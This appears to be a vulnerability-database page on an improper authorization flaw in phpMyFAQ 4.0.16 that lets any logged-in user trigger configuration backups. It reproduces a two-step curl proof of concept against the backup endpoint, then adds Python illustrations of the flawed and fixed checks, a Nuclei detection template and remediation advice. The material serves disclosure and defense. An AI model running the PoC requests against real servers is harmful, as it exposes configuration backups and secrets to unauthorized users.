[webapps] phpMyFAQ 4.0.16 - Improper Authorization

CVE-2026-24421

Vulnerability

High · CVSS N/A

📋 Basic vulnerability information

- CVE: CVE-2026-24421
- Vulnerability type: Vulnerability
- Affected versions: see the original report
- Severity: High · CVSS N/A
- Published: 2026-04-29
- Submitted by: GUIA BRAHIM FOUAD
- Source: Exploit-DB original ↗

⚔️ Original PoC

# Exploit Author: GUIA BRAHIM FOUAD
## Summary
Authenticated non-admin users can call /api/setup/backup and trigger a configuration backup. The endpoint checks authentication but does not enforce authorization (missing configuration/admin permission check), and returns a link/path to the generated ZIP.
## Details
SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged-in user to create a sensitive backup and retrieve its path.
## PoC
Precondition: API enabled, any authenticated non-admin user.
1) Log in as a non-admin user:
curl -c /tmp/pmf_api_cookies.txt \
-H 'Content-Type: application/json' \
-d '{"username":"tester","password":"Test1234!"}' \
http://192.168.40.16/phpmyfaq/api/v3.0/login
2) Trigger backup generation:
curl -i -b /tmp/pmf_api_cookies.txt \
-X POST --data '4.0.16' \
http://192.168.40.16/phpmyfaq/api/setup/backup
## Expected Result
The API responds successfully and includes a link/path to the generated ZIP backup even though the caller is not an admin / does not have configuration-edit permissions.
## Impact
Low-privileged users can generate sensitive backups. If the ZIP is web-accessible (server misconfiguration), this can lead to exposure of secrets/configuration and facilitate follow-on compromise.
## References
- GitHub Advisory: GHSA-wm8h-26fv-mg7g
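The report above turns on the difference between authentication (is the caller logged in?) and authorization (may this caller do this?). The following Python model is an added illustration and not phpMyFAQ code: it places a handler that only checks for a logged-in session (the shape the advisory describes for SetupController.php) next to a hardened handler whose decorator also enforces a configuration permission and denies by default. `User`, `Response`, `CONFIGURATION_EDIT`, `require_permission` and the handler names are hypothetical, chosen for the example; the backup path is constructed.

```python
"""Authentication versus authorization on a backup endpoint.

Added illustration in Python, not phpMyFAQ code: it models the gap the
advisory describes (an authenticated-only check with no permission check)
and a hardened handler that also enforces a configuration permission.
User, Response, CONFIGURATION_EDIT, require_permission and the handler
names are hypothetical; only the shape of the check mirrors the advisory.
"""
from dataclasses import dataclass, field
from functools import wraps
from typing import Callable, Optional

# Hypothetical permission name; the real project defines its own permission set.
CONFIGURATION_EDIT = "configuration_edit"


@dataclass(frozen=True)
class User:
    name: str
    permissions: frozenset = field(default_factory=frozenset)


@dataclass(frozen=True)
class Response:
    status: int
    body: dict


def create_backup_archive() -> str:
    """Stand-in for the real backup routine; returns the path the endpoint reveals."""
    return "/example/phpmyfaq/content/backup/backup-example.zip"  # constructed path


def backup_vulnerable(user: Optional[User]) -> Response:
    """Checks only that *someone* is logged in (the shape the advisory describes)."""
    if user is None:
        return Response(401, {"error": "login required"})
    return Response(200, {"backup": create_backup_archive()})


def require_permission(permission: str) -> Callable:
    """Decorator that enforces authentication AND a named permission, deny by default."""
    def decorator(handler: Callable[[Optional[User]], Response]):
        @wraps(handler)
        def guarded(user: Optional[User]) -> Response:
            if user is None:
                return Response(401, {"error": "login required"})
            if permission not in user.permissions:
                # Deny without revealing whether a backup exists or where it lives.
                return Response(403, {"error": "insufficient permissions"})
            return handler(user)
        return guarded
    return decorator


@require_permission(CONFIGURATION_EDIT)
def backup_fixed(user: Optional[User]) -> Response:
    """Same backup logic; the decorator guarantees the permission check cannot be skipped."""
    return Response(200, {"backup": create_backup_archive()})


def authz_matrix() -> dict:
    """Exercise both handlers with constructed anonymous, non-admin and admin callers."""
    callers = {
        "anonymous": None,
        "tester": User("tester"),                                 # logged in, no admin rights
        "admin": User("admin", frozenset({CONFIGURATION_EDIT})),
    }
    return {
        "vulnerable": {name: backup_vulnerable(u).status for name, u in callers.items()},
        "fixed": {name: backup_fixed(u).status for name, u in callers.items()},
    }


if __name__ == "__main__":
    for variant, statuses in authz_matrix().items():
        print(f"{variant:10s} {statuses}")
```

Running the block prints the status matrix: the vulnerable handler returns 200 with a backup path to the non-admin `tester`, while the hardened handler returns 403 to `tester` and 200 only to the caller holding the permission. Putting the check in a decorator rather than inside each handler is the design point: a privileged endpoint added later cannot forget it.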

🔍 Nuclei detection template

The following detection template is used to determine whether a target is affected:

id: CVE-2026-24421-detection

info:
  name: phpMyFAQ <= 4.0.16 - Detection
  author: glitr
  severity: high
  description: |
    Detects phpMyFAQ instances that are potentially vulnerable to CVE-2026-24421
    (Improper Authorization in backup API endpoint).
  metadata:
    max-request: 4
    verified: true
    shodan-query: title:"phpMyFAQ"
  tags: cve,cve2026,phpmyfaq,detection

http:
  - method: GET
    path:
      - "{{BaseURL}}/phpmyfaq/api/index.php"
      - "{{BaseURL}}/api/index.php"
      - "{{BaseURL}}/phpmyfaq/"
      - "{{BaseURL}}/"

    stop-at-first-match: true

    # The extractor is evaluated first and stores the captured version under the
    # name "version" so the DSL matcher can compare it; internal keeps it out of the output.
    extractors:
      - type: regex
        name: version
        internal: true
        part: body
        group: 1
        regex:
          - 'phpMyFAQ[\s]*([0-9]+\.[0-9]+\.[0-9]+)'
          - '"version":"([0-9]+\.[0-9]+\.[0-9]+)"'

    # Both conditions must hold: a version string was found AND it is <= 4.0.16.
    # With "or", the regex alone would flag every phpMyFAQ install regardless of version.
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'phpMyFAQ[\s]*([0-9]+\.[0-9]+\.[0-9]+)'
          - '"version":"([0-9]+\.[0-9]+\.[0-9]+)"'
      - type: dsl
        dsl:
          - "compare_versions(version, '<= 4.0.16')"
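The template's decision comes down to two steps: pull a version string out of the response body with the two regexes above, then decide whether it falls in the affected range (<= 4.0.16). The Python below is an added stand-alone version of that gate, not part of the page's template or of phpMyFAQ; the sample bodies are constructed. It also shows why the comparison must be numeric: a plain string comparison ranks "4.0.9" above "4.0.16" and would miss an affected install.

```python
"""Version gate behind the detection template, as a stand-alone check.

Added example, not part of the page's Nuclei template or of phpMyFAQ: applies
the template's two regexes to a response body, then compares the extracted
version numerically against the last affected release (4.0.16). The sample
bodies are constructed for the example.
"""
import re
from typing import Optional, Tuple

# The same two patterns the template uses, with the version in group 1.
VERSION_PATTERNS = [
    re.compile(r'phpMyFAQ[\s]*([0-9]+\.[0-9]+\.[0-9]+)'),
    re.compile(r'"version":"([0-9]+\.[0-9]+\.[0-9]+)"'),
]

LAST_AFFECTED = "4.0.16"  # from the advisory: phpMyFAQ <= 4.0.16


def extract_version(body: str) -> Optional[str]:
    """Return the first version string any pattern captures, or None."""
    for pattern in VERSION_PATTERNS:
        match = pattern.search(body)
        if match:
            return match.group(1)
    return None


def version_tuple(version: str) -> Tuple[int, ...]:
    """'4.0.16' -> (4, 0, 16); integer tuples compare component by component."""
    return tuple(int(part) for part in version.split("."))


def is_affected(version: str) -> bool:
    """Numeric comparison: the check the template's compare_versions() expresses."""
    return version_tuple(version) <= version_tuple(LAST_AFFECTED)


def naive_string_compare(version: str) -> bool:
    """The wrong way: lexicographic order says '4.0.9' > '4.0.16', hiding an affected host."""
    return version <= LAST_AFFECTED


def assess(body: str) -> dict:
    """Combine extraction and comparison; 'affected' is None when no version was found."""
    version = extract_version(body)
    if version is None:
        return {"version": None, "affected": None}
    return {"version": version, "affected": is_affected(version)}


# Constructed sample bodies: an HTML footer and an API JSON document.
SAMPLE_HTML = '<footer>powered by phpMyFAQ 4.0.16</footer>'
SAMPLE_JSON = '{"name":"phpMyFAQ","version":"4.1.2"}'
SAMPLE_NONE = '<html><body>nothing to see</body></html>'

if __name__ == "__main__":
    for label, body in (("html", SAMPLE_HTML), ("json", SAMPLE_JSON), ("none", SAMPLE_NONE)):
        print(label, assess(body))
    print("4.0.9 numeric:", is_affected("4.0.9"), "string:", naive_string_compare("4.0.9"))
```

A version match is only a "potentially vulnerable" signal, as the template's own description says: the authorization gap is reachable only when the API is enabled, and a backported fix would not change the banner. Treat a hit as a prompt to verify the deployed build, not as proof of exposure.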

🛡️ Remediation

Upgrade to the vendor's latest security release (see GHSA-wm8h-26fv-mg7g). Until that is done, limit API access to trusted accounts and make sure generated backup ZIPs are not stored in a web-accessible directory, since the report notes that a web-reachable archive is what turns this into exposure of configuration and secrets.

⚠️ This article is based on public vulnerability databases and is provided for security research and defensive reference only. Generated: 2026-05-07 07:14 | Source: Exploit-DB

[!] CONTACT_CHANNELS

For business cooperation, technical consulting or vulnerability feedback, contact the author through the following offshore node.

> PING_AUTHOR (@A1RedTeam)